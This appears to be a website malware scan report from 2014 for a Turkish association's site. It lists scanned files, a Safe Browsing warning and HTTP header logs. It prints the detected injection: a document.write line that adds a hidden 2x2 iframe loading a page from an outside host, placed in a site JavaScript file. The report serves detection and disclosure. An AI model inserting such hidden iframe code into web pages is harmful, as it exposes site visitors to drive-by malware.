Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=girisimcilerdernegi.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://girisimcilerdernegi.org/ | 200 OK Content-Length: 31438 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/templates/bt_arise/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://girisimcilerdernegi.org/index.php?jat3action=gzip&jat3type=js&jat3file=t3-assets%2Fjs_60370.js | 200 OK Content-Length: 111066 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=3257280></iframe>');
(function(){this.MooTools={version:"1.4.5",build:"ab8ea8824dc3b24b6666867a2c4ed58ebb762cf0"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family!=null){return i.$family(); }if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace"; !1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=3257280 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=3257280> | ||
http://girisimcilerdernegi.org//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Not Found Content-Length: 440 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/test404page.js | 404 Not Found Content-Length: 440 Content-Type: text/html | clean |
http://girisimcilerdernegi.org/index.php?jat3action=gzip&jat3type=js&jat3file=t3-assets%2Fjs_31274.js | 200 OK Content-Length: 276604 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Connection: close
Date: Tue, 08 Jul 2014 09:22:44 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires:
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5040a3ddd2fd88f0cc4b1627e633c5f7=019cdffbb80606c3dc3dbc6825f2d3dd; path=/
Set-Cookie: bt_arise_tpl=bt_arise; expires=Sun, 28-Jun-2015 09:22:43 GMT; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Result:
HTTP/1.1 200 OK
Cache-Control: private
Cache-Control: no-cache
Connection: close
Date: Tue, 08 Jul 2014 09:22:44 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
Expires:
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5040a3ddd2fd88f0cc4b1627e633c5f7=019cdffbb80606c3dc3dbc6825f2d3dd; path=/
Set-Cookie: bt_arise_tpl=bt_arise; expires=Sun, 28-Jun-2015 09:22:43 GMT; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Referer: http://www.google.com/search?q=girisimcilerdernegi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: girisimcilerdernegi.org
Referer: http://www.google.com/search?q=girisimcilerdernegi.org
Result:
The result is similar to the first query. There are no suspicious redirects found.